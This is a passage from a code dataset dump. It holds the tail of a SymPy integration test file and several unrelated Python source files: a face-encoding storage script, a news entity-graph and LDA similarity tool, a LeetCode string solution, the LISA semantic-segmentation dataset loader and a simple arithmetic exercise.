[2])\n G = [(Poly(1, x), Poly(x, x))]\n assert limited_integrate(Poly(5*x**2, x), Poly(3, x), G, DE) == \\\n ((Poly(5*x**3/9, x), Poly(1, x)), [0])\n\n\ndef test_is_log_deriv_k_t_radical():\n DE = DifferentialExtension(extension={'D': [Poly(1, x)], 'E_K': [], 'L_K': [],\n 'E_args': [], 'L_args': []})\n assert is_log_deriv_k_t_radical(Poly(2*x, x), Poly(1, x), DE) is None\n\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(2*t1, t1), Poly(1/x, t2)],\n 'L_K': [2], 'E_K': [1], 'L_args': [x], 'E_args': [2*x]})\n assert is_log_deriv_k_t_radical(Poly(x + t2/2, t2), Poly(1, t2), DE) == \\\n ([(t1, 1), (x, 1)], t1*x, 2, 0)\n # TODO: Add more tests\n\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t0, t0), Poly(1/x, t)],\n 'L_K': [2], 'E_K': [1], 'L_args': [x], 'E_args': [x]})\n assert is_log_deriv_k_t_radical(Poly(x + t/2 + 3, t), Poly(1, t), DE) == \\\n ([(t0, 2), (x, 1)], x*t0**2, 2, 3)\n\n\ndef test_is_deriv_k():\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(1/x, t1), Poly(1/(x + 1), t2)],\n 'L_K': [1, 2], 'E_K': [], 'L_args': [x, x + 1], 'E_args': []})\n assert is_deriv_k(Poly(2*x**2 + 2*x, t2), Poly(1, t2), DE) == \\\n ([(t1, 1), (t2, 1)], t1 + t2, 2)\n\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(1/x, t1), Poly(t2, t2)],\n 'L_K': [1], 'E_K': [2], 'L_args': [x], 'E_args': [x]})\n assert is_deriv_k(Poly(x**2*t2**3, t2), Poly(1, t2), DE) == \\\n ([(x, 3), (t1, 2)], 2*t1 + 3*x, 1)\n # TODO: Add more tests, including ones with exponentials\n\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(2/x, t1)],\n 'L_K': [1], 'E_K': [], 'L_args': [x**2], 'E_args': []})\n assert is_deriv_k(Poly(x, 
t1), Poly(1, t1), DE) == \\\n        ([(t1, S(1)/2)], t1/2, 1)\n\n    DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(2/(1 + x), t0)],\n        'L_K': [1], 'E_K': [], 'L_args': [x**2 + 2*x + 1], 'E_args': []})\n    assert is_deriv_k(Poly(1 + x, t0), Poly(1, t0), DE) == \\\n        ([(t0, S(1)/2)], t0/2, 1)\n\n\ndef test_is_log_deriv_k_t_radical_in_field():\n    # NOTE: any potential constant factor in the second element of the result\n    # doesn't matter, because it cancels in Da/a.\n    DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(1/x, t)]})\n    assert is_log_deriv_k_t_radical_in_field(Poly(5*t + 1, t), Poly(2*t*x, t), DE) == \\\n        (2, t*x**5)\n    assert is_log_deriv_k_t_radical_in_field(Poly(2 + 3*t, t), Poly(5*x*t, t), DE) == \\\n        (5, x**3*t**2)\n\n    DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(-t/x**2, t)]})\n    assert is_log_deriv_k_t_radical_in_field(Poly(-(1 + 2*t), t),\n        Poly(2*x**2 + 2*x**2*t, t), DE) == \\\n        (2, t + t**2)\n    assert is_log_deriv_k_t_radical_in_field(Poly(-1, t), Poly(x**2, t), DE) == \\\n        (1, t)\n    assert is_log_deriv_k_t_radical_in_field(Poly(1, t), Poly(2*x**2, t), DE) == \\\n        (2, 1/t)\n\n\ndef test_parametric_log_deriv():\n    DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(1/x, t)]})\n    assert parametric_log_deriv_heu(Poly(5*t**2 + t - 6, t), Poly(2*x*t**2, t),\n        Poly(-1, t), Poly(x*t**2, t), DE) == \\\n        (2, 6, t*x**5)\n","repo_name":"securesystemslab/zippy","sub_path":"zippy/benchmarks/src/benchmarks/sympy/sympy/integrals/tests/test_prde.py","file_name":"test_prde.py","file_ext":"py","file_size_in_byte":10926,"program_lang":"python","lang":"en","doc_type":"code","stars":297,"dataset":"github-code","pt":"75"} +{"seq_id":"35881481472","text":"import os\nimport sys\nimport pickle\nimport face_recognition\n\n# load input data from arguments\nfriendImage = face_recognition.load_image_file(sys.argv[1])\nuserPath = sys.argv[2]\nfriendId = sys.argv[3]\n\n# open existing encodings file or create new encoding dictionary\ntry: \n    encodings = pickle.load(open(userPath + \"/encodings.pickle\", \"rb\"))\nexcept (OSError, IOError) as error:\n    encodings = {}\n\n# create new encoding and add to dictionary\nfriendEncoding = face_recognition.face_encodings(friendImage)\nencodings[friendId] = friendEncoding[0]\n\n# write encodings dictionary out to file\noutfile = open(userPath + \"/encodings.pickle\", \"wb\")\npickle.dump(encodings, outfile)\noutfile.close()\n\n\n### Pseudocode\n# Take image on command line (argv 2)\n# Encode image with face_recognition\n# Save encoding object to variable\n# If no file then create new dictionary with encoding\n# else open pickle file, add encoding to dictionary\n# re-pickle dictionary\n# done","repo_name":"eyedoor/Server","sub_path":"face_recognition/createEncoding.py","file_name":"createEncoding.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30204513693","text":"import argparse\nimport cmd\nimport sys\nimport re\nimport os\nimport pickle\n\nfrom nltk.tokenize import StanfordTokenizer\n\n\nimport pandas as pd\nimport src.spaCy as sp\nfrom src.entity import Entity\nfrom src.document import Document\nfrom src.graph import GraphObject\nfrom src.similarity import Similarity\nfrom src.prompt import Prompt\nfrom src.query import Query\n\n#inv_map = {v: k for k, v in my_map.items()}\nclass Main:\n\n    def __init__(self):\n\n        self.entities = []\n        self.counter_entities = 0\n        self.ent2idx = {}\n        self.load_equal_entities()\n\n        self.documents 
= []\n self.counter_documents = 0\n self.amount_documents = 80000#1000\n\n self.queries = []\n self.counter_queries = 0\n\n self.spacy_instance = sp.SpaCy()\n self.similarity_object = Similarity()\n self.graph_instance = GraphObject()\n\n self.ent_doc_dataset_path = './data/ent_doc_dataset/ent_doc_dataset_path.pickle'\n\n def main(self, path_documents):\n\n self.document_files = self.load_documents(path_documents)\n\n #self.create_and_train_similarity(path_documents, similarity_object)\n\n #self.train_models(path_documents)\n\n\n self.similarity_object.load_dictionary()\n\n self.similarity_object.load_lda()\n self.similarity_object.load_lda_index()\n\n #self.show_topics(self.similarity_object.lda, 70, self.similarity_object.dictionary)\n\n\n #self.similarity_object.load_corpus()\n\n #self.similarity_object.load_tf_idf()\n #self.similarity_object.load_tf_idf_index()\n\n #self.similarity_object.tf_idf_similarity_matrix()\n #self.similarity_object.tf_idf_train()\n\n\n \"\"\"\n import time\n import sent2vec\n\n\n sentences = [\"first sentence .\", \"another sentence that I don't like so much, I'll go there Mr. Obama.\"]\n SNLP_TAGGER_JAR = os.path.join(\"./utils/stanford-postagger-full-2018-02-27/\", \"stanford-postagger.jar\")\n tknzr = StanfordTokenizer(SNLP_TAGGER_JAR, encoding='utf-8')\n s = ' '.join(sentences) #just a trick to make things faster\n tokenized_sentences_SNLP = self.tokenize_sentences(tknzr, [s])\n tokenized_sentences_SNLP = tokenized_sentences_SNLP[0].split(' ')\n assert(len(tokenized_sentences_SNLP) == len(sentences))\n print(tokenized_sentences_SNLP)\n\n model = sent2vec.Sent2vecModel()\n model.load_model('./data/models/wiki_unigrams.bin')\n emb = model.embed_sentence(\"once upon a time .\")\n t0 = time.time()\n embs = model.embed_sentences([\"first sentence .\", \"another sentence\"])\n print(time.time() - t0)\n \"\"\"\n\n #sys.exit()\n\n #for i in range(0, lda.num_topics - 1):\n # print(lda.show_topic(i))\n #documents = self.load_documents(path_documents)\n #gen_docs = similarity_object.tokenize_documents(documents['body'])\n #similarity_object.generate_corpus(gen_docs)\n #similarity_object.lda_train()\n #self.similarity_object.tf_idf_train()\n\n self.fill_dataset_and_graph()\n\n # \"\"\" UNCOMMENT\n p = Prompt(self, sys.argv[1:])\n p.cmdloop()\n\n # \"\"\"\n\n def fill_dataset_and_graph(self):\n print(\"Reading documents and finding entities.\")\n # Fill our objects\n self.fill_ent_doc_memory_database(self.document_files, load=True) # change to load or create\n\n # Fill our Neo4j Graph\n self.graph_instance.populate(self.entities, self.ent2idx, self.documents, self.queries)\n\n # If a document doesn't have entities it will not appear in the graph: NOT true anymore, because it will have similarities\n print(\"\\tAdding entities and documents to the graph.\")\n for idx, document in enumerate(self.documents):\n self.graph_instance.add_ent_to_doc(document)\n self.update_progress(idx+1, len(self.documents))\n print('\\n')\n\n print(\"\\tAdding similarities to the graph.\")\n for idx, document in enumerate(self.documents):\n self.graph_instance.add_similarity_to_doc(document)\n self.update_progress(idx+1, len(self.documents))\n print('\\n')\n\n def make_query(self, query_text):\n query_object = Query(self.counter_queries, query_text)\n entities_found = self.text_to_ent_idx(query_text)\n query_object.add_entities(entities_found)\n doc_similarities = self.find_similarities(query_text)\n query_object.add_similarities(doc_similarities)\n self.queries.append(query_object)\n 
self.counter_queries += 1\n self.graph_instance.add_ent_to_doc(query_object, type='QUERY')\n self.graph_instance.add_similarity_to_query(query_object, type='QUERY')\n\n print(\"Similarities\", query_object.similarities)\n\n \"\"\"\n search = \"Mr. Obama and Mr. Donald J. Trump both like to eat ice-creams\"\n entities_found = self.text_to_ent_idx(search)\n response = graph_instance.find_documents_on_entities(entities_found)\n\n # print(response[0].get('labels'), response[0].get('name'))\n # print(response)\n \"\"\"\n\n # The input format of documents should be a dataframe with columns; head & body.\n # This function is meant to fill the entities and documents.\n def fill_ent_doc_memory_database(self, documents, load=True):\n print(\"\\tAdding entities, documents and similarities to our database.\")\n if load:\n\n with open(self.ent_doc_dataset_path, 'rb') as handle:\n from_pickle = pickle.load(handle)\n self.entities = from_pickle[\"entities\"]\n self.counter_entities = from_pickle[\"counter_entities\"]\n self.documents = from_pickle[\"documents\"]\n self.ent2idx = from_pickle[\"ent2idx\"]\n self.counter_documents = from_pickle[\"counter_documents\"]\n self.amount_documents = from_pickle[\"amount_documents\"]\n\n else:\n if self.amount_documents > len(documents):\n self.amount_documents = len(documents)\n for idx_doc, document in documents.iterrows():\n\n if idx_doc >= self.amount_documents:\n break\n import time\n #t0 = time.time()\n # entities\n doc_entities = self.fill_ent_database(self.counter_documents, document['body']+document['head'])\n document_object = Document(self.counter_documents, document['head'], document['body'])\n document_object.add_entities(doc_entities)\n #t1 = time.time() -t0\n #print(\"time entities:\",t1 )\n #t0 = time.time()\n # similarities\n doc_similarities = self.find_similarities(document['body']+document['head'])\n document_object.add_similarities(doc_similarities)\n #print(\"time similarities:\", time.time() - t0)\n self.documents.append(document_object)\n self.counter_documents += 1\n self.update_progress(idx_doc+1, self.amount_documents)\n\n to_pickle = {\n \"entities\": self.entities,\n \"counter_entities\": self.counter_entities,\n \"documents\": self.documents,\n \"ent2idx\": self.ent2idx,\n \"counter_documents\": self.counter_documents,\n \"amount_documents\": self.amount_documents\n }\n with open(self.ent_doc_dataset_path, 'wb') as handle:\n pickle.dump(to_pickle, handle, protocol=pickle.HIGHEST_PROTOCOL)\n print(\"The dataset has been stored in\", self.ent_doc_dataset_path)\n\n # Finds the entities of a text document and maintains coherence with the entities list.\n def fill_ent_database(self, doc_id, text):\n # Text(text) Start End Label(label_) Description\n entities = self.spacy_instance.find_entities(text)\n doc_entities = []\n for ent in entities:\n if self.is_valid_entity(ent):\n label = ent.text+'_'+ent.label_\n if (label) not in self.ent2idx:\n self.ent2idx[label] = self.counter_entities\n entity_object = Entity(self.counter_entities, ent.text, ent.label_)\n entity_object.append_document(doc_id)\n self.entities.append(entity_object)\n self.counter_entities += 1\n doc_entities.append(self.ent2idx[label])\n else:\n if doc_id not in self.entities[self.ent2idx[label]].documents:\n self.entities[self.ent2idx[label]].append_document(doc_id)\n doc_entities.append(self.ent2idx[label])\n return doc_entities\n\n def find_similarities(self, text):\n return
self.similarity_object.query_to_lda(text, language='english', k=20, verbose = False)\n\n # Finds the entities of a text document (??? I DONT KNOW and maintains coherence with the entities list.)\n def text_to_ent_idx(self, text):\n # Text(text) Start End Label(label_) Description\n entities = self.spacy_instance.find_entities(text)\n doc_entities = []\n total_ent_in_database = 0\n for ent in entities:\n if self.is_valid_entity(ent):\n label = ent.text+'_'+ent.label_\n # Check if its already there in case because it could have an alias\n if (label) in self.ent2idx:\n entity = self.ent2idx[label]\n #total_ent_in_database += 1\n doc_entities.append(entity)\n else:\n print(\"Entity <\", label, \">not found in the graph\")\n return doc_entities\n\n # There are some kind of buggy entities that we will filter out.\n def is_valid_entity(self,ent):\n text = ent.text\n label = ent.label_\n if ('_' in text) or ('—' in text) or (text == \" \") or (text == \"'s\") or (text == \" \") or (text == \" \") or (text == \" \") or (text == \" \"):\n return False\n elif (label == 'PERSON') or (label == 'ORG') or (label == 'LOC') or (label == 'DOCUMENT') or (label == 'NORP') or (label == 'GPE'):\n return True\n else: return False\n\n # This is to assign multiple names of entities to a single id, e.g: D.J.Trump and Trump\n def load_equal_entities(self):\n list = []\n equal1 = ['Donald J. Trump_PERSON', 'Trump_PERSON', 'Trump_ORG', 'Trump_NORP', 'Trump_GPE']\n equal2 = ['Queen Elizabeth II_PERSON', 'Queen Elizabeth_PERSON']\n equal3 = ['Obama_PERSON', 'Obama_GPE']\n list.append(equal1)\n list.append(equal2)\n list.append(equal3)\n for equality_group in list:\n for count, equality in enumerate(equality_group):\n ent_text, ent_label = equality.split('_')\n if count == 0:\n entity_object = Entity(self.counter_entities, ent_text, ent_label)\n else:\n entity_object.append_alias(ent_text)\n self.ent2idx[equality] = self.counter_entities\n self.entities.append(entity_object)\n self.counter_entities += 1\n\n def train_models(self, path_documents):\n documents = self.load_documents(path_documents)\n gen_docs = self.similarity_object.tokenize_documents(documents['body'])\n self.similarity_object.generate_corpus(gen_docs)\n self.similarity_object.lda_train()\n self.similarity_object.tf_idf_train()\n\n # Function to load the articles.csv dataset.\n def load_documents(self, path):\n with open(path) as myCSV:\n # idx, title, publication, author, date, year, month, url, content\n data = pd.read_csv(myCSV)\n documents = data[['title', 'content']].copy()\n documents.rename(columns={'title': 'head', 'content': 'body'}, inplace=True)\n return documents\n\n def update_progress(self, count, total):\n bar_len = 60\n suffix = ''\n filled_len = int(round(bar_len * count / float(total)))\n percents = round(100.0 * count / float(total), 1)\n bar = '=' * filled_len + '-' * (bar_len - filled_len)\n sys.stdout.write('[%s] %s%s ...%s\\r' % (bar, percents, '%', suffix))\n sys.stdout.flush()\n\n def create_and_train_similarity(self, path_documents, similarity_object):\n documents = self.load_documents(path_documents)\n gen_docs = similarity_object.tokenize_documents(documents['body'])\n similarity_object.generate_corpus(gen_docs)\n similarity_object.lda()\n\n def show_topics(self,model, num_topics, dict_sim):\n for i, topic in enumerate(model.show_topics(num_topics=num_topics, formatted=False)):\n tmp_int = 1\n p_total = 0\n first = True\n for id,p in topic[1]:\n p_total += p\n if p >= 0.009:\n if first:\n print(\"Topic #\", topic[0], \":\")\n 
first = False\n print(str(tmp_int),\"(\",str('{0:.2f}'.format(p)),\"):\\t\",str(dict_sim[int(id)]))\n tmp_int += 1\n\n def tokenize(self, tknzr, sentence, to_lower=True):\n \"\"\"Arguments:\n - tknzr: a tokenizer implementing the NLTK tokenizer interface\n - sentence: a string to be tokenized\n - to_lower: lowercasing or not\n \"\"\"\n sentence = sentence.strip()\n sentence = ' '.join([self.format_token(x) for x in tknzr.tokenize(sentence)])\n if to_lower:\n sentence = sentence.lower()\n sentence = re.sub('((www\\.[^\\s]+)|(https?://[^\\s]+)|(http?://[^\\s]+))','<url>',sentence) #replace urls by <url>\n sentence = re.sub('(\\@[^\\s]+)','<user>',sentence) #replace @user268 by <user>\n filter(lambda word: ' ' not in word, sentence)\n return sentence\n\n def format_token(self, token):\n \"\"\"\"\"\"\n if token == '-LRB-':\n token = '('\n elif token == '-RRB-':\n token = ')'\n elif token == '-RSB-':\n token = ']'\n elif token == '-LSB-':\n token = '['\n elif token == '-LCB-':\n token = '{'\n elif token == '-RCB-':\n token = '}'\n return token\n\n def tokenize_sentences(self, tknzr, sentences, to_lower=True):\n \"\"\"Arguments:\n - tknzr: a tokenizer implementing the NLTK tokenizer interface\n - sentences: a list of sentences\n - to_lower: lowercasing or not\n \"\"\"\n return [self.tokenize(tknzr, s, to_lower) for s in sentences]\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Anemone')\n parser.add_argument('-d','--documents', help='Path to documents dataset',\n default='./data/documents/articles.csv')\n parser.add_argument(\"-l\",\"--loaddefault\", help=\"load existing database\",\n action=\"store_true\")\n args = parser.parse_args()\n m = Main()\n m.main(path_documents=args.documents)\n\n#Main()\n\n\"\"\"\ninit\nmodel\nload\npredict\n\"\"\"\n\n\"\"\"documents = {'head':\"Mr. 
_ and President Obama went on vacations the 1st of September.\",\n 'body':\"Hello everybody\"}\n\nfor entity in self.entities:\n if len(entity.documents) > 1:#2,3,4\n print(entity.text, entity.documents)\nfor idx in [2,3,4]:\n for text in self.documents[idx].entities:\n if 'American' in text.text:\n print(text.text)\n#print(self.documents[2].entities.text,self.documents[3].entities.text,self.documents[4].entities.text)\n\"\"\"","repo_name":"ficapal18/anemone","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14179672591","text":"'''\nTwo Pointers\nT: O(N)\nS: O(N)\n\nYou are here!\nYour runtime beats 15.83 % of python3 submissions.\nYou are here!\nYour memory usage beats 48.72 % of python3 submissions.\n'''\nclass Solution:\n def reverseOnlyLetters(self, s: str) -> str:\n ss = list(s)\n l , r = 0, len(ss) - 1\n while l < r:\n while l < r and not ss[l].isalpha():\n l += 1\n while l < r and not ss[r].isalpha():\n r -= 1\n if l >= r:\n break\n ss[l], ss[r] = ss[r], ss[l]\n l += 1; r -= 1\n \n return ''.join(ss)\n","repo_name":"lixiang2017/leetcode","sub_path":"explore/2021/september/Reverse_Only_Letters.py","file_name":"Reverse_Only_Letters.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7834427886","text":"import glob\nimport json\nimport os\nimport random\n\nimport cv2\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom PIL import Image\nfrom pycocotools.coco import COCO\nfrom transformers import CLIPImageProcessor\n\nfrom model.llava import conversation as conversation_lib\nfrom model.segment_anything.utils.transforms import ResizeLongestSide\n\nfrom .utils import ANSWER_LIST, SHORT_QUESTION_LIST\n\n\ndef init_mapillary(base_image_dir):\n mapillary_data_root = os.path.join(base_image_dir, \"mapillary\")\n with open(os.path.join(mapillary_data_root, \"config_v2.0.json\")) as f:\n mapillary_classes = json.load(f)[\"labels\"]\n mapillary_classes = [x[\"readable\"].lower() for x in mapillary_classes]\n mapillary_classes = np.array(mapillary_classes)\n mapillary_labels = sorted(\n glob.glob(\n os.path.join(mapillary_data_root, \"training\", \"v2.0\", \"labels\", \"*.png\")\n )\n )\n mapillary_images = [\n x.replace(\".png\", \".jpg\").replace(\"v2.0/labels\", \"images\")\n for x in mapillary_labels\n ]\n print(\"mapillary: \", len(mapillary_images))\n return mapillary_classes, mapillary_images, mapillary_labels\n\n\ndef init_ade20k(base_image_dir):\n with open(\"utils/ade20k_classes.json\", \"r\") as f:\n ade20k_classes = json.load(f)\n ade20k_classes = np.array(ade20k_classes)\n image_ids = sorted(\n os.listdir(os.path.join(base_image_dir, \"ade20k/images\", \"training\"))\n )\n ade20k_image_ids = []\n for x in image_ids:\n if x.endswith(\".jpg\"):\n ade20k_image_ids.append(x[:-4])\n ade20k_images = []\n for image_id in ade20k_image_ids: # self.descriptions:\n ade20k_images.append(\n os.path.join(\n base_image_dir,\n \"ade20k\",\n \"images\",\n \"training\",\n \"{}.jpg\".format(image_id),\n )\n )\n ade20k_labels = [\n x.replace(\".jpg\", \".png\").replace(\"images\", \"annotations\")\n for x in ade20k_images\n ]\n print(\"ade20k: \", len(ade20k_images))\n return ade20k_classes, ade20k_images, ade20k_labels\n\n\ndef init_cocostuff(base_image_dir):\n cocostuff_classes = []\n with open(\"utils/cocostuff_classes.txt\") as f:\n 
for line in f.readlines()[1:]:\n cocostuff_classes.append(line.strip().split(\": \")[-1])\n cocostuff_classes = np.array(cocostuff_classes)\n cocostuff_images = []\n\n cocostuff_labels = glob.glob(\n os.path.join(base_image_dir, \"cocostuff\", \"train2017\", \"*.png\")\n )\n cocostuff_images = [\n x.replace(\".png\", \".jpg\").replace(\"cocostuff\", \"coco\") for x in cocostuff_labels\n ]\n\n print(\"cocostuff: \", len(cocostuff_images))\n return cocostuff_classes, cocostuff_images, cocostuff_labels\n\n\ndef init_paco_lvis(base_image_dir):\n coco_api_paco_lvis = COCO(\n os.path.join(\n base_image_dir, \"vlpart\", \"paco\", \"annotations\", \"paco_lvis_v1_train.json\"\n )\n )\n all_classes = coco_api_paco_lvis.loadCats(coco_api_paco_lvis.getCatIds())\n class_map_paco_lvis = {}\n for cat in all_classes:\n cat_split = cat[\"name\"].strip().split(\":\")\n if len(cat_split) == 1:\n name = cat_split[0].split(\"_(\")[0]\n else:\n assert len(cat_split) == 2\n obj, part = cat_split\n obj = obj.split(\"_(\")[0]\n part = part.split(\"_(\")[0]\n name = (obj, part)\n class_map_paco_lvis[cat[\"id\"]] = name\n img_ids = coco_api_paco_lvis.getImgIds()\n print(\"paco_lvis: \", len(img_ids))\n return class_map_paco_lvis, img_ids, coco_api_paco_lvis\n\n\ndef init_pascal_part(base_image_dir):\n coco_api_pascal_part = COCO(\n os.path.join(base_image_dir, \"vlpart\", \"pascal_part\", \"train.json\")\n )\n all_classes = coco_api_pascal_part.loadCats(coco_api_pascal_part.getCatIds())\n class_map_pascal_part = {}\n for cat in all_classes:\n cat_main, cat_part = cat[\"name\"].strip().split(\":\")\n name = (cat_main, cat_part)\n class_map_pascal_part[cat[\"id\"]] = name\n img_ids = coco_api_pascal_part.getImgIds()\n print(\"pascal_part: \", len(img_ids))\n return class_map_pascal_part, img_ids, coco_api_pascal_part\n\n\nclass SemSegDataset(torch.utils.data.Dataset):\n pixel_mean = torch.Tensor([123.675, 116.28, 103.53]).view(-1, 1, 1)\n pixel_std = torch.Tensor([58.395, 57.12, 57.375]).view(-1, 1, 1)\n img_size = 1024\n ignore_label = 255\n\n def __init__(\n self,\n base_image_dir,\n tokenizer,\n vision_tower,\n samples_per_epoch=500 * 8 * 2 * 10,\n precision: str = \"fp32\",\n image_size: int = 224,\n num_classes_per_sample: int = 3,\n exclude_val=False,\n sem_seg_data=\"ade20k||cocostuff||partimagenet||pascal_part||paco_lvis||mapillary\",\n ):\n self.exclude_val = exclude_val\n self.samples_per_epoch = samples_per_epoch\n self.num_classes_per_sample = num_classes_per_sample\n\n self.base_image_dir = base_image_dir\n self.image_size = image_size\n self.tokenizer = tokenizer\n self.precision = precision\n self.transform = ResizeLongestSide(image_size)\n self.clip_image_processor = CLIPImageProcessor.from_pretrained(vision_tower)\n\n self.short_question_list = SHORT_QUESTION_LIST\n self.answer_list = ANSWER_LIST\n\n self.data2list = {}\n self.data2classes = {}\n\n self.sem_seg_datas = sem_seg_data.split(\"||\")\n for ds in self.sem_seg_datas:\n classes, images, labels = eval(\"init_{}\".format(ds))(base_image_dir)\n self.data2list[ds] = (images, labels)\n self.data2classes[ds] = classes\n\n if \"cocostuff\" in self.sem_seg_datas:\n self.cocostuff_class2index = {\n c: i for i, c in enumerate(self.data2classes[\"cocostuff\"])\n }\n\n def __len__(self):\n return self.samples_per_epoch\n\n def preprocess(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"Normalize pixel values and pad to a square input.\"\"\"\n # Normalize colors\n x = (x - self.pixel_mean) / self.pixel_std\n\n # Pad\n h, w = x.shape[-2:]\n padh = 
self.img_size - h\n padw = self.img_size - w\n x = F.pad(x, (0, padw, 0, padh))\n return x\n\n def __getitem__(self, idx):\n ds = random.randint(0, len(self.sem_seg_datas) - 1)\n ds = self.sem_seg_datas[ds]\n\n if ds in [\"paco_lvis\", \"pascal_part\"]:\n class_map = self.data2classes[ds]\n img_ids, coco_api = self.data2list[ds]\n idx = random.randint(0, len(img_ids) - 1)\n img_id = img_ids[idx]\n image_info = coco_api.loadImgs([img_id])[0]\n file_name = image_info[\"file_name\"]\n if ds == \"pascal_part\":\n file_name = os.path.join(\n \"VOCdevkit\", \"VOC2010\", \"JPEGImages\", file_name\n )\n image_path = os.path.join(self.base_image_dir, \"vlpart\", ds, file_name)\n elif ds == \"paco_lvis\":\n image_path = os.path.join(self.base_image_dir, \"coco\", file_name)\n image = cv2.imread(image_path)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n # preprocess image for clip\n image_clip = self.clip_image_processor.preprocess(\n image, return_tensors=\"pt\"\n )[\"pixel_values\"][0]\n image = self.transform.apply_image(image) # preprocess image for sam\n resize = image.shape[:2]\n annIds = coco_api.getAnnIds(imgIds=image_info[\"id\"])\n anns = coco_api.loadAnns(annIds)\n if len(anns) == 0:\n return self.__getitem__(0)\n if len(anns) >= self.num_classes_per_sample:\n sampled_anns = np.random.choice(\n anns, size=self.num_classes_per_sample, replace=False\n ).tolist()\n else:\n sampled_anns = anns\n sampled_classes = []\n for ann in sampled_anns:\n sampled_cls = class_map[ann[\"category_id\"]]\n if isinstance(sampled_cls, tuple):\n obj, part = sampled_cls\n if random.random() < 0.5:\n name = obj + \" \" + part\n else:\n name = \"the {} of the {}\".format(part, obj)\n else:\n name = sampled_cls\n sampled_classes.append(name)\n\n elif ds in [\"ade20k\", \"cocostuff\", \"mapillary\"]:\n image, labels = self.data2list[ds]\n idx = random.randint(0, len(image) - 1)\n image_path = image[idx]\n label_path = labels[idx]\n label = Image.open(label_path)\n label = np.array(label)\n if ds == \"ade20k\":\n label[label == 0] = 255\n label -= 1\n label[label == 254] = 255\n elif ds == \"cocostuff\":\n for c, i in self.cocostuff_class2index.items():\n if \"-\" in c:\n label[label == i] = 255\n img = cv2.imread(image_path)\n image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n # preprocess image for clip\n image_clip = self.clip_image_processor.preprocess(\n image, return_tensors=\"pt\"\n )[\"pixel_values\"][0]\n image = self.transform.apply_image(image) # preprocess image for sam\n resize = image.shape[:2]\n unique_label = np.unique(label).tolist()\n if 255 in unique_label:\n unique_label.remove(255)\n if len(unique_label) == 0:\n return self.__getitem__(0)\n\n classes = [self.data2classes[ds][class_id] for class_id in unique_label]\n if len(classes) >= self.num_classes_per_sample:\n sampled_classes = np.random.choice(\n classes, size=self.num_classes_per_sample, replace=False\n ).tolist()\n else:\n sampled_classes = classes\n\n questions = []\n answers = []\n class_ids = []\n for sampled_cls in sampled_classes:\n text = sampled_cls\n\n assert len(text.split(\"||\")) == 1\n question_template = random.choice(self.short_question_list)\n questions.append(question_template.format(class_name=text.lower()))\n\n answers.append(random.choice(self.answer_list))\n\n if ds in [\"paco_lvis\", \"pascal_part\"]:\n continue\n\n class_id = self.data2classes[ds].tolist().index(sampled_cls)\n class_ids.append(class_id)\n\n conversations = []\n conv = conversation_lib.default_conversation.copy()\n\n i = 0\n while i < 
len(questions):\n conv.messages = []\n conv.append_message(conv.roles[0], questions[i])\n conv.append_message(conv.roles[1], answers[i])\n conversations.append(conv.get_prompt())\n i += 1\n\n image = self.preprocess(torch.from_numpy(image).permute(2, 0, 1).contiguous())\n\n if ds in [\"paco_lvis\", \"pascal_part\"]:\n masks = []\n for ann in sampled_anns:\n try:\n masks.append(coco_api.annToMask(ann))\n except Exception as e:\n print(e)\n return self.__getitem__(0)\n\n masks = np.stack(masks, axis=0)\n masks = torch.from_numpy(masks)\n label = torch.ones(masks.shape[1], masks.shape[2]) * self.ignore_label\n\n else:\n label = torch.from_numpy(label).long()\n masks = []\n for class_id in class_ids:\n masks.append(label == class_id)\n masks = torch.stack(masks, dim=0)\n return (\n image_path,\n image,\n image_clip,\n conversations,\n masks,\n label,\n resize,\n questions,\n sampled_classes,\n )\n","repo_name":"dvlab-research/LISA","sub_path":"utils/sem_seg_dataset.py","file_name":"sem_seg_dataset.py","file_ext":"py","file_size_in_byte":12040,"program_lang":"python","lang":"en","doc_type":"code","stars":1109,"dataset":"github-code","pt":"75"}
{"seq_id":"14830743976","text":"a = int(input(\"A: \"))\nb = int(input(\"B: \"))\nc = int(input(\"C: \"))\nd = int(input(\"D: \"))\n\nadicao1 = a + b\nadicao2 = a + c\nadicao3 = a + d\nadicao4 = b + c\nadicao5 = b + d\nadicao6 = c + d\n\nmultiplicacao1 = a * b\nmultiplicacao2 = a * c\nmultiplicacao3 = a * d\nmultiplicacao4 = b * c\nmultiplicacao5 = b * d\nmultiplicacao6 = c * d\n\nprint(adicao1, adicao2, adicao3, adicao4, adicao5, adicao6, multiplicacao1, multiplicacao2, multiplicacao3, multiplicacao4, multiplicacao5, multiplicacao6)","repo_name":"rafinhao11/python_exercises","sub_path":"cap3_ex3g_pg55.py","file_name":"cap3_ex3g_pg55.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
